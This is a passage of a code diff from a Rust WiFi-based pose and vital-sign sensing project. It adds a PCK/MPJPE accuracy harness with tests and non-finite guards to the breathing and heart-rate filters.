// nose displaced 0.06, shoulder displaced 0.10, hips exact.
|
||||
let pred = pose17(&[
|
||||
(0, 0.56, 0.10), // err 0.06
|
||||
(5, 0.60, 0.30), // err 0.10
|
||||
(CANON_LEFT_HIP, 0.40, 0.90), // exact
|
||||
(CANON_RIGHT_HIP, 0.60, 0.90), // exact
|
||||
]);
|
||||
let vis = vis17(&[0, 5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
|
||||
|
||||
// Torso τ@20 = 0.04: nose 0.06>0.04 wrong, sh 0.10>0.04 wrong,
|
||||
// hips exact ⇒ 2/4 = 0.5.
|
||||
let (_, _, torso) = pck_at(&pred, >, &vis, 20, PckNormalization::TorsoDiameter);
|
||||
// Bbox diag = sqrt(0.68)=0.82462; τ@20 = 0.164924:
|
||||
// nose 0.06 ≤ τ correct, sh 0.10 ≤ τ correct, hips exact ⇒ 4/4 = 1.0.
|
||||
let (_, _, bbox) = pck_at(&pred, >, &vis, 20, PckNormalization::BoundingBoxDiagonal);
|
||||
// Abs(0.08): nose 0.06 ≤ 0.08 correct, sh 0.10 > 0.08 wrong, hips exact
|
||||
// ⇒ 3/4 = 0.75.
|
||||
let (_, _, abs) = pck_at(&pred, >, &vis, 20, PckNormalization::AbsolutePixels(0.08));
|
||||
|
||||
assert!((torso - 0.5).abs() < 1e-6, "torso PCK expected 0.5, got {torso}");
|
||||
assert!((bbox - 1.0).abs() < 1e-6, "bbox PCK expected 1.0, got {bbox}");
|
||||
assert!((abs - 0.75).abs() < 1e-6, "abs(0.08) PCK expected 0.75, got {abs}");
|
||||
|
||||
// The whole point: identical predictions, three DISTINCT PCK values.
|
||||
assert!(torso != bbox && bbox != abs && torso != abs,
|
||||
"normalizations must give distinct PCK: torso={torso}, bbox={bbox}, abs={abs}");
|
||||
}
|
||||
|
||||
// -------- AbsolutePixels ignores k (raw threshold) --------
|
||||
#[test]
|
||||
fn absolute_pixels_ignores_threshold_percentage() {
|
||||
let gt = pose17(&[(5, 0.50, 0.50), (CANON_LEFT_HIP, 0.40, 0.50), (CANON_RIGHT_HIP, 0.60, 0.50)]);
|
||||
let pred = pose17(&[(5, 0.53, 0.50), (CANON_LEFT_HIP, 0.40, 0.50), (CANON_RIGHT_HIP, 0.60, 0.50)]);
|
||||
let vis = vis17(&[5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
|
||||
// τ = 0.05 raw; joint5 err 0.03 ≤ 0.05 correct. k=5 and k=99 must agree.
|
||||
let (_, _, p5) = pck_at(&pred, >, &vis, 5, PckNormalization::AbsolutePixels(0.05));
|
||||
let (_, _, p99) = pck_at(&pred, >, &vis, 99, PckNormalization::AbsolutePixels(0.05));
|
||||
assert_eq!(p5, p99, "AbsolutePixels must ignore the k percentage");
|
||||
assert!((p5 - 1.0).abs() < 1e-6, "all three within 0.05, got {p5}");
|
||||
}
|
||||
|
||||
// -------- MPJPE hand-computed (2D and 3D) --------
|
||||
#[test]
|
||||
fn mpjpe_hand_computed_2d() {
|
||||
// joint0 err (3,4)->5, joint1 exact->0 ⇒ mean (5+0)/2 = 2.5.
|
||||
let gt = Array2::from_shape_vec((2, 2), vec![0.0, 0.0, 1.0, 1.0]).unwrap();
|
||||
let pred = Array2::from_shape_vec((2, 2), vec![3.0, 4.0, 1.0, 1.0]).unwrap();
|
||||
let vis = Array1::from(vec![2.0, 2.0]);
|
||||
assert!((mpjpe(&pred, >, &vis) - 2.5).abs() < 1e-6);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn mpjpe_hand_computed_3d() {
|
||||
// single joint err (1,2,2) -> sqrt(1+4+4)=3.0.
|
||||
let gt = Array2::from_shape_vec((1, 3), vec![0.0, 0.0, 0.0]).unwrap();
|
||||
let pred = Array2::from_shape_vec((1, 3), vec![1.0, 2.0, 2.0]).unwrap();
|
||||
let vis = Array1::from(vec![2.0]);
|
||||
assert!((mpjpe(&pred, >, &vis) - 3.0).abs() < 1e-6);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn mpjpe_excludes_invisible_joints() {
|
||||
// joint0 visible err 5, joint1 INVISIBLE err 100 ⇒ mean = 5 (joint1 dropped).
|
||||
let gt = Array2::from_shape_vec((2, 2), vec![0.0, 0.0, 0.0, 0.0]).unwrap();
|
||||
let pred = Array2::from_shape_vec((2, 2), vec![3.0, 4.0, 100.0, 0.0]).unwrap();
|
||||
let vis = Array1::from(vec![2.0, 0.0]);
|
||||
assert!((mpjpe(&pred, >, &vis) - 5.0).abs() < 1e-6);
|
||||
}
|
||||
|
||||
// -------- degenerate inputs: no panic --------
|
||||
#[test]
|
||||
fn zero_torso_is_unscoreable_not_perfect() {
|
||||
// Both hips coincident ⇒ torso ≈ 0; bbox also collapses ⇒ None.
|
||||
let gt = pose17(&[(CANON_LEFT_HIP, 0.5, 0.5), (CANON_RIGHT_HIP, 0.5, 0.5)]);
|
||||
let vis = vis17(&[CANON_LEFT_HIP, CANON_RIGHT_HIP]);
|
||||
assert_eq!(pck_at(>, >, &vis, 20, PckNormalization::TorsoDiameter), (0, 0, 0.0));
|
||||
assert_eq!(pck_at(>, >, &vis, 20, PckNormalization::BoundingBoxDiagonal), (0, 0, 0.0));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn no_visible_keypoints_scores_zero() {
|
||||
let gt = pose17(&[(CANON_LEFT_HIP, 0.4, 0.5), (CANON_RIGHT_HIP, 0.6, 0.5)]);
|
||||
let vis = vis17(&[]); // nothing visible
|
||||
let (c, t, pck) = pck_at(>, >, &vis, 20, PckNormalization::TorsoDiameter);
|
||||
assert_eq!((c, t, pck), (0, 0, 0.0));
|
||||
assert_eq!(mpjpe(>, >, &vis), 0.0);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn nan_coords_do_not_panic_and_count_wrong() {
|
||||
let gt = pose17(&[(5, 0.5, 0.5), (CANON_LEFT_HIP, 0.4, 0.5), (CANON_RIGHT_HIP, 0.6, 0.5)]);
|
||||
let mut pred = gt.clone();
|
||||
pred[[5, 0]] = f32::NAN; // joint 5 prediction is NaN
|
||||
let vis = vis17(&[5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
|
||||
let (c, t, pck) = pck_at(&pred, >, &vis, 20, PckNormalization::TorsoDiameter);
|
||||
assert_eq!(t, 3);
|
||||
assert_eq!(c, 2, "NaN joint must count as wrong, hips correct ⇒ 2/3");
|
||||
assert!((pck - 2.0 / 3.0).abs() < 1e-6);
|
||||
// mpjpe with a NaN joint yields NaN (caller filters) but must not panic.
|
||||
assert!(mpjpe(&pred, >, &vis).is_nan());
|
||||
}
|
||||
|
||||
// -------- batch report: micro-average + self-describing struct --------
|
||||
#[test]
|
||||
fn accuracy_report_micro_averages_and_carries_definition() {
|
||||
// Frame A: 2 visible, both correct (2/2). Frame B: 2 visible, both wrong (0/2).
|
||||
// Micro-average over joints: 2 correct / 4 = 0.5 (NOT mean-of-frame-PCK,
|
||||
// which would be (1.0+0.0)/2 = 0.5 here too, but the accumulator is the
|
||||
// joint-level one).
|
||||
let gt = pose17(&[(CANON_LEFT_HIP, 0.40, 0.50), (CANON_RIGHT_HIP, 0.60, 0.50)]);
|
||||
let vis = vis17(&[CANON_LEFT_HIP, CANON_RIGHT_HIP]);
|
||||
let frame_a = PoseFrame { pred: gt.clone(), gt: gt.clone(), visibility: vis.clone() };
|
||||
// Frame B: displace both hips by 0.05 (> τ 0.04) ⇒ both wrong.
|
||||
let pred_b = pose17(&[(CANON_LEFT_HIP, 0.45, 0.50), (CANON_RIGHT_HIP, 0.65, 0.50)]);
|
||||
let frame_b = PoseFrame { pred: pred_b, gt: gt.clone(), visibility: vis.clone() };
|
||||
|
||||
let report = accuracy_report(
|
||||
&[frame_a, frame_b],
|
||||
&[20, 50],
|
||||
PckNormalization::TorsoDiameter,
|
||||
);
|
||||
assert_eq!(report.n_frames, 2);
|
||||
assert_eq!(report.n_keypoints, 17);
|
||||
assert_eq!(report.normalization, PckNormalization::TorsoDiameter);
|
||||
// PCK@20: 2 correct / 4 visible = 0.5.
|
||||
assert!((report.pck(20).unwrap() - 0.5).abs() < 1e-6);
|
||||
// PCK@50: τ = 0.5·0.20 = 0.10, frame B err 0.05 ≤ 0.10 ⇒ all correct
|
||||
// ⇒ 4/4 = 1.0.
|
||||
assert!((report.pck(50).unwrap() - 1.0).abs() < 1e-6);
|
||||
// A reported number always carries its definition in the summary.
|
||||
assert!(report.summary().contains("torso-diameter"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn accuracy_report_empty_is_zero_not_nan() {
|
||||
let report = accuracy_report(&[], &[20], PckNormalization::BoundingBoxDiagonal);
|
||||
assert_eq!(report.n_frames, 0);
|
||||
assert_eq!(report.pck(20), Some(0.0));
|
||||
assert_eq!(report.mpjpe, 0.0);
|
||||
assert!(!report.mpjpe.is_nan());
|
||||
}
|
||||
|
||||
// -------- bbox-norm is looser than torso-norm (sanity, on a batch) --------
|
||||
#[test]
|
||||
fn bbox_norm_scores_at_least_torso_norm() {
|
||||
// bbox diagonal >= torso span always (bbox encloses the hips), so for the
|
||||
// SAME frames bbox-PCK >= torso-PCK at the same k. Pin this ordering.
|
||||
let gt = pose17(&[
|
||||
(0, 0.50, 0.10),
|
||||
(5, 0.50, 0.40),
|
||||
(CANON_LEFT_HIP, 0.40, 0.90),
|
||||
(CANON_RIGHT_HIP, 0.60, 0.90),
|
||||
]);
|
||||
let pred = pose17(&[
|
||||
(0, 0.55, 0.10),
|
||||
(5, 0.58, 0.40),
|
||||
(CANON_LEFT_HIP, 0.42, 0.90),
|
||||
(CANON_RIGHT_HIP, 0.62, 0.90),
|
||||
]);
|
||||
let vis = vis17(&[0, 5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
|
||||
let frame = PoseFrame { pred, gt, visibility: vis };
|
||||
let torso = accuracy_report(std::slice::from_ref(&frame), &[20], PckNormalization::TorsoDiameter);
|
||||
let bbox = accuracy_report(std::slice::from_ref(&frame), &[20], PckNormalization::BoundingBoxDiagonal);
|
||||
assert!(
|
||||
bbox.pck(20).unwrap() >= torso.pck(20).unwrap(),
|
||||
"bbox-norm (looser) must be >= torso-norm: bbox={:?} torso={:?}",
|
||||
bbox.pck(20), torso.pck(20)
|
||||
);
|
||||
}
|
||||
}
|
||||
@@ -43,6 +43,11 @@
|
||||
// All *this* crate's code is written without unsafe blocks.
|
||||
#![warn(missing_docs)]
|
||||
|
||||
/// Metric-locked pose-accuracy harness (ADR-155 §Tier-1.2; needs ADR slot 173)
|
||||
/// — selectable `PckNormalization` (torso / bbox-diagonal / absolute), `mpjpe`,
|
||||
/// and a self-describing `PoseAccuracy` result so a reported PCK number always
|
||||
/// carries the definition it was computed under.
|
||||
pub mod accuracy;
|
||||
pub mod config;
|
||||
pub mod dataset;
|
||||
pub mod domain;
|
||||
@@ -89,6 +94,11 @@ pub use metrics_core::{
|
||||
canonical_torso_size, oks_canonical, pck_canonical, CANON_LEFT_HIP, CANON_RIGHT_HIP,
|
||||
COCO_KP_SIGMAS,
|
||||
};
|
||||
// ADR-155 §Tier-1.2 — metric-locked accuracy harness (selectable PCK
|
||||
// normalization + MPJPE + self-describing result).
|
||||
pub use accuracy::{
|
||||
accuracy_report, mpjpe as pck_mpjpe, pck_at, PckNormalization, PoseAccuracy, PoseFrame,
|
||||
};
|
||||
pub use config::TrainingConfig;
|
||||
pub use dataset::{
|
||||
CsiDataset, CsiSample, DataLoader, MmFiDataset, SyntheticConfig, SyntheticCsiDataset,
|
||||
|
||||
@@ -29,6 +29,66 @@
|
||||
|
||||
use ndarray::{Array1, Array2};
|
||||
use wifi_densepose_train::{oks_canonical, pck_canonical, CANON_LEFT_HIP, CANON_RIGHT_HIP};
|
||||
// ADR-155 §Tier-1.2 — metric-locked accuracy harness public surface.
|
||||
use wifi_densepose_train::{accuracy_report, pck_at, PckNormalization, PoseFrame};
|
||||
|
||||
// ---------------------------------------------------------------------------
|
||||
// Metric-locked accuracy harness: the three PCK normalizations are reachable
|
||||
// from the crate root and give DIFFERENT PCK on identical predictions — the
|
||||
// proof that the 96 / 81.6 / 61 figures were non-comparable (validated here as
|
||||
// a downstream consumer would call it).
|
||||
// ---------------------------------------------------------------------------
|
||||
|
||||
/// Identical predictions, three declared normalizations ⇒ three distinct PCK.
|
||||
/// Hand calc (all coords in `[0,1]`):
|
||||
/// * GT: nose(0)=(0.50,0.10), l_sh(5)=(0.50,0.30), hips=(0.40,0.90)/(0.60,0.90).
|
||||
/// * Pred: nose err 0.06, shoulder err 0.10, hips exact.
|
||||
/// * torso = 0.20 ⇒ τ@20 = 0.04 ⇒ only hips correct ⇒ 2/4 = **0.50**.
|
||||
/// * bbox = √(0.20²+0.80²)=0.82462 ⇒ τ@20 = 0.16492 ⇒ all correct ⇒ **1.00**.
|
||||
/// * abs(0.08): nose 0.06≤0.08 ok, shoulder 0.10>0.08 wrong ⇒ 3/4 = **0.75**.
|
||||
#[test]
|
||||
fn harness_three_normalizations_differ_from_crate_root() {
|
||||
let gt = pose17(&[
|
||||
(0, 0.50, 0.10),
|
||||
(5, 0.50, 0.30),
|
||||
(CANON_LEFT_HIP, 0.40, 0.90),
|
||||
(CANON_RIGHT_HIP, 0.60, 0.90),
|
||||
]);
|
||||
let pred = pose17(&[
|
||||
(0, 0.56, 0.10),
|
||||
(5, 0.60, 0.30),
|
||||
(CANON_LEFT_HIP, 0.40, 0.90),
|
||||
(CANON_RIGHT_HIP, 0.60, 0.90),
|
||||
]);
|
||||
let vis = vis17(&[0, 5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
|
||||
|
||||
let (_, _, torso) = pck_at(&pred, >, &vis, 20, PckNormalization::TorsoDiameter);
|
||||
let (_, _, bbox) = pck_at(&pred, >, &vis, 20, PckNormalization::BoundingBoxDiagonal);
|
||||
let (_, _, abs) = pck_at(&pred, >, &vis, 20, PckNormalization::AbsolutePixels(0.08));
|
||||
|
||||
assert!((torso - 0.50).abs() < 1e-6, "torso PCK 0.50, got {torso}");
|
||||
assert!((bbox - 1.00).abs() < 1e-6, "bbox PCK 1.00, got {bbox}");
|
||||
assert!((abs - 0.75).abs() < 1e-6, "abs(0.08) PCK 0.75, got {abs}");
|
||||
assert!(
|
||||
torso != bbox && bbox != abs && torso != abs,
|
||||
"three normalizations must be distinct: {torso} / {bbox} / {abs}"
|
||||
);
|
||||
}
|
||||
|
||||
/// `accuracy_report` returns a self-describing result carrying its normalization,
|
||||
/// so an unlabeled PCK number is structurally impossible at the API boundary.
|
||||
#[test]
|
||||
fn harness_report_carries_normalization_label() {
|
||||
let gt = pose17(&[(CANON_LEFT_HIP, 0.40, 0.50), (CANON_RIGHT_HIP, 0.60, 0.50)]);
|
||||
let vis = vis17(&[CANON_LEFT_HIP, CANON_RIGHT_HIP]);
|
||||
let frame = PoseFrame { pred: gt.clone(), gt: gt.clone(), visibility: vis };
|
||||
let report = accuracy_report(&[frame], &[20], PckNormalization::BoundingBoxDiagonal);
|
||||
assert_eq!(report.normalization, PckNormalization::BoundingBoxDiagonal);
|
||||
assert_eq!(report.n_keypoints, 17);
|
||||
assert_eq!(report.n_frames, 1);
|
||||
assert!((report.pck(20).unwrap() - 1.0).abs() < 1e-6);
|
||||
assert!(report.summary().contains("bbox-diagonal"));
|
||||
}
|
||||
|
||||
// ---------------------------------------------------------------------------
|
||||
// Tests that use `EvalMetrics` (requires tch-backend because the metrics
|
||||
|
||||
@@ -174,6 +174,20 @@ impl BreathingExtractor {
|
||||
let output =
|
||||
(1.0 - r) * (input - state.x2) + 2.0 * r * cos_w0 * state.y1 - r * r * state.y2;
|
||||
|
||||
// Self-healing non-finite guard (ADR-158 §A1). A single non-finite
|
||||
// sample — a NaN/inf residual from a corrupt CSI frame, or a transient
|
||||
// overflow — would otherwise be stored into `y1`/`y2` and poison the
|
||||
// resonator recurrence *permanently*: every subsequent output stays
|
||||
// NaN, the `extract()` finite-check drops it, and the history buffer
|
||||
// never refills, so breathing extraction is dead until `reset()`.
|
||||
// Resetting the filter state here lets the resonator recover on the next
|
||||
// clean frame; the 0.0 we return for this frame is still dropped by the
|
||||
// caller's `is_finite()` check, so no spurious sample enters history.
|
||||
if !output.is_finite() {
|
||||
*state = IirState::default();
|
||||
return 0.0;
|
||||
}
|
||||
|
||||
state.x2 = state.x1;
|
||||
state.x1 = input;
|
||||
state.y2 = state.y1;
|
||||
@@ -396,6 +410,75 @@ mod tests {
|
||||
assert!((0.0..=2.0).contains(&fused), "weighted average must be in-range: {fused}");
|
||||
}
|
||||
|
||||
/// ADR-158 §A1 bug-catching test: a single non-finite residual must NOT
|
||||
/// permanently poison the IIR filter state.
|
||||
///
|
||||
/// The resonator recurrence stores `y[n]` into the filter state. Before the
|
||||
/// fix, one NaN/inf residual produced a NaN `output`, the `extract()`
|
||||
/// finite-guard dropped that frame from history — but the NaN was already
|
||||
/// latched into `state.y1`/`y2`, so every subsequent output stayed NaN, the
|
||||
/// finite-guard rejected it too, and the history buffer never refilled.
|
||||
/// Breathing extraction was then dead until `reset()`. A control run on the
|
||||
/// same clean signal yields 15 BPM (0.25 Hz); after a leading NaN frame the
|
||||
/// OLD code returned `None` with `history_len() == 0` forever. This test
|
||||
/// asserts recovery (FAILS on the old code, verified by reverting the
|
||||
/// `bandpass_filter` self-heal).
|
||||
#[test]
|
||||
fn nan_frame_does_not_permanently_poison_filter() {
|
||||
let sr = 10.0;
|
||||
let feed_clean = |ext: &mut BreathingExtractor| {
|
||||
let mut last = None;
|
||||
for i in 0..600 {
|
||||
let t = i as f64 / sr;
|
||||
let s = (2.0 * std::f64::consts::PI * 0.25 * t).sin();
|
||||
last = ext.extract(&[s], &[1.0]);
|
||||
}
|
||||
last
|
||||
};
|
||||
|
||||
// Control: clean signal accumulates history and detects ~15 BPM.
|
||||
let mut control = BreathingExtractor::new(1, sr, 60.0);
|
||||
let control_res = feed_clean(&mut control);
|
||||
assert!(control.history_len() > 0);
|
||||
assert!(control_res.is_some(), "control clean run must produce an estimate");
|
||||
|
||||
// A leading NaN frame must not kill the extractor.
|
||||
let mut ext = BreathingExtractor::new(1, sr, 60.0);
|
||||
ext.extract(&[f64::NAN], &[1.0]);
|
||||
let res = feed_clean(&mut ext);
|
||||
assert!(
|
||||
ext.history_len() > 0,
|
||||
"extractor must recover and refill history after a NaN frame (got {})",
|
||||
ext.history_len()
|
||||
);
|
||||
assert!(res.is_some(), "extractor must recover an estimate after a NaN frame");
|
||||
}
|
||||
|
||||
/// ADR-158 §A1: a mid-stream `inf` must not freeze the history buffer.
|
||||
#[test]
|
||||
fn inf_mid_stream_does_not_freeze_history() {
|
||||
let sr = 10.0;
|
||||
let mut ext = BreathingExtractor::new(1, sr, 60.0);
|
||||
let clean = |ext: &mut BreathingExtractor, count: usize| {
|
||||
for i in 0..count {
|
||||
let t = i as f64 / sr;
|
||||
let s = (2.0 * std::f64::consts::PI * 0.25 * t).sin();
|
||||
ext.extract(&[s], &[1.0]);
|
||||
}
|
||||
};
|
||||
clean(&mut ext, 300);
|
||||
let before = ext.history_len();
|
||||
assert!(before > 0);
|
||||
ext.extract(&[f64::INFINITY], &[1.0]); // poison mid-stream
|
||||
clean(&mut ext, 600);
|
||||
assert!(
|
||||
ext.history_len() > before,
|
||||
"history must keep growing after an inf frame (before={}, after={})",
|
||||
before,
|
||||
ext.history_len()
|
||||
);
|
||||
}
|
||||
|
||||
/// ADR-157 §A3 bug-catching test. Divergence needs the pole magnitude
|
||||
/// `|r| >= 1`, i.e. `bw >= 4`. At `fs = 0.5` Hz with the band widened to
|
||||
/// 0.1-0.9 Hz, `bw = 2*pi*(0.9-0.1)/0.5 = 10.05`, so the OLD pole radius
|
||||
|
||||
@@ -32,6 +32,15 @@ impl Default for IirState {
|
||||
}
|
||||
}
|
||||
|
||||
/// Lowest physiologically plausible heart rate, in BPM. Estimates below this
|
||||
/// (e.g. a lock onto a breathing harmonic, which the firmware #987 fix also
|
||||
/// guards against) are rejected rather than emitted as a confident vital — a
|
||||
/// false low HR is a safety problem. Value-identical to the prior literal.
|
||||
const HR_PLAUSIBLE_MIN_BPM: f64 = 40.0;
|
||||
/// Highest physiologically plausible heart rate, in BPM. Estimates above this
|
||||
/// are rejected. Value-identical to the prior literal.
|
||||
const HR_PLAUSIBLE_MAX_BPM: f64 = 180.0;
|
||||
|
||||
/// Heart rate extractor using bandpass filtering and autocorrelation
|
||||
/// peak detection.
|
||||
pub struct HeartRateExtractor {
|
||||
@@ -140,8 +149,11 @@ impl HeartRateExtractor {
|
||||
let frequency_hz = self.sample_rate / period_samples as f64;
|
||||
let bpm = frequency_hz * 60.0;
|
||||
|
||||
// Validate BPM is in physiological range (40-180 BPM)
|
||||
if !(40.0..=180.0).contains(&bpm) {
|
||||
// Validate BPM is in the physiological plausibility band. An estimate
|
||||
// outside [HR_PLAUSIBLE_MIN_BPM, HR_PLAUSIBLE_MAX_BPM] is rejected
|
||||
// rather than emitted, so an out-of-band autocorrelation lock can never
|
||||
// surface as a confident heart rate.
|
||||
if !(HR_PLAUSIBLE_MIN_BPM..=HR_PLAUSIBLE_MAX_BPM).contains(&bpm) {
|
||||
return None;
|
||||
}
|
||||
|
||||
@@ -191,6 +203,20 @@ impl HeartRateExtractor {
|
||||
let output =
|
||||
(1.0 - r) * (input - state.x2) + 2.0 * r * cos_w0 * state.y1 - r * r * state.y2;
|
||||
|
||||
// Self-healing non-finite guard (ADR-158 §A1). A single non-finite
|
||||
// sample — a NaN/inf residual from a corrupt CSI frame, or a transient
|
||||
// overflow — would otherwise be written into `y1`/`y2` and poison the
|
||||
// resonator recurrence *permanently*: every later output stays NaN, the
|
||||
// `extract()` finite-check drops it, `acf0` never recomputes on fresh
|
||||
// data, and heart-rate extraction is dead until `reset()`. Resetting the
|
||||
// filter state here lets the resonator recover on the next clean frame;
|
||||
// the 0.0 returned for this frame is still dropped by the caller's
|
||||
// `is_finite()` check, so no spurious sample enters history.
|
||||
if !output.is_finite() {
|
||||
*state = IirState::default();
|
||||
return 0.0;
|
||||
}
|
||||
|
||||
state.x2 = state.x1;
|
||||
state.x1 = input;
|
||||
state.y2 = state.y1;
|
||||
@@ -420,6 +446,92 @@ mod tests {
|
||||
assert_eq!(ext.n_subcarriers, 56);
|
||||
}
|
||||
|
||||
/// Pin the physiological plausibility band to its documented values. If a
|
||||
/// future edit widens these, an implausible HR could be emitted as a
|
||||
/// confident vital — this characterization test forces that to be a
|
||||
/// deliberate, reviewed change.
|
||||
#[test]
|
||||
fn plausibility_band_constants_pinned() {
|
||||
assert!((HR_PLAUSIBLE_MIN_BPM - 40.0).abs() < f64::EPSILON);
|
||||
assert!((HR_PLAUSIBLE_MAX_BPM - 180.0).abs() < f64::EPSILON);
|
||||
}
|
||||
|
||||
/// ADR-158 §A1 bug-catching test: a single non-finite residual must NOT
|
||||
/// permanently poison the IIR filter state.
|
||||
///
|
||||
/// The cardiac resonator latches `y[n]` into `state.y1`/`y2`. Before the
|
||||
/// fix, one NaN/inf residual produced a NaN `output` that was stored into
|
||||
/// the state; the `extract()` finite-guard dropped that frame from history,
|
||||
/// but every subsequent output stayed NaN, so the history buffer never
|
||||
/// refilled and HR extraction was dead until `reset()`. After a leading NaN
|
||||
/// frame, the OLD code returned `None` with `history_len() == 0` forever.
|
||||
/// This asserts recovery (FAILS on the old code).
|
||||
#[test]
|
||||
fn nan_frame_does_not_permanently_poison_filter() {
|
||||
let sr = 50.0;
|
||||
let feed_clean = |ext: &mut HeartRateExtractor| {
|
||||
let mut last = None;
|
||||
for i in 0..1200 {
|
||||
let t = i as f64 / sr;
|
||||
let base = (2.0 * std::f64::consts::PI * 1.2 * t).sin();
|
||||
let r = vec![base * 0.1, base * 0.08, base * 0.12, base * 0.09];
|
||||
last = ext.extract(&r, &[0.0, 0.01, 0.02, 0.03]);
|
||||
}
|
||||
last
|
||||
};
|
||||
|
||||
let mut control = HeartRateExtractor::new(4, sr, 20.0);
|
||||
feed_clean(&mut control);
|
||||
assert!(control.history_len() > 0, "control clean run must accumulate history");
|
||||
|
||||
let mut ext = HeartRateExtractor::new(4, sr, 20.0);
|
||||
ext.extract(&[f64::NAN, 0.1, 0.1, 0.1], &[0.0, 0.01, 0.02, 0.03]);
|
||||
feed_clean(&mut ext);
|
||||
assert!(
|
||||
ext.history_len() > 0,
|
||||
"HR extractor must recover and refill history after a NaN frame (got {})",
|
||||
ext.history_len()
|
||||
);
|
||||
}
|
||||
|
||||
/// Safety negative: pure broadband noise (no cardiac component) must NOT be
|
||||
/// reported as a clinically `Valid` heart rate. A false "HR = 72 bpm" on
|
||||
/// noise is a safety problem (false reassurance / false alert). The
|
||||
/// extractor may still emit a low-confidence guess, but its status must be
|
||||
/// `Degraded`/`Unreliable`, never `Valid`. Mirrors the honest-negative
|
||||
/// requirement in the review brief.
|
||||
#[test]
|
||||
fn pure_noise_is_never_reported_valid() {
|
||||
let mut seed: u64 = 0x1234_5678;
|
||||
let mut rng = || {
|
||||
seed = seed
|
||||
.wrapping_mul(6_364_136_223_846_793_005)
|
||||
.wrapping_add(1_442_695_040_888_963_407);
|
||||
((seed >> 33) as f64 / (1u64 << 31) as f64) - 1.0
|
||||
};
|
||||
let mut ext = HeartRateExtractor::new(8, 50.0, 20.0);
|
||||
let mut last = None;
|
||||
for _ in 0..1500 {
|
||||
let r: Vec<f64> = (0..8).map(|_| rng()).collect();
|
||||
let p: Vec<f64> = (0..8).map(|_| rng()).collect();
|
||||
last = ext.extract(&r, &p);
|
||||
}
|
||||
if let Some(est) = last {
|
||||
assert_ne!(
|
||||
est.status,
|
||||
VitalStatus::Valid,
|
||||
"pure noise must not yield a clinically Valid HR (bpm={}, conf={})",
|
||||
est.value_bpm,
|
||||
est.confidence
|
||||
);
|
||||
assert!(
|
||||
est.confidence < 0.6,
|
||||
"noise HR confidence must stay below the Valid cutoff: {}",
|
||||
est.confidence
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
/// ADR-157 §A3 bug-catching test.
|
||||
///
|
||||
/// Divergence needs the pole *magnitude* `|r| >= 1`, i.e. `bw >= 4`. With
|
||||
|
||||
Vendored
+1
-1
Submodule vendor/rufield updated: ba66e2e0a6...509d8ae29e
Reference in New Issue
Block a user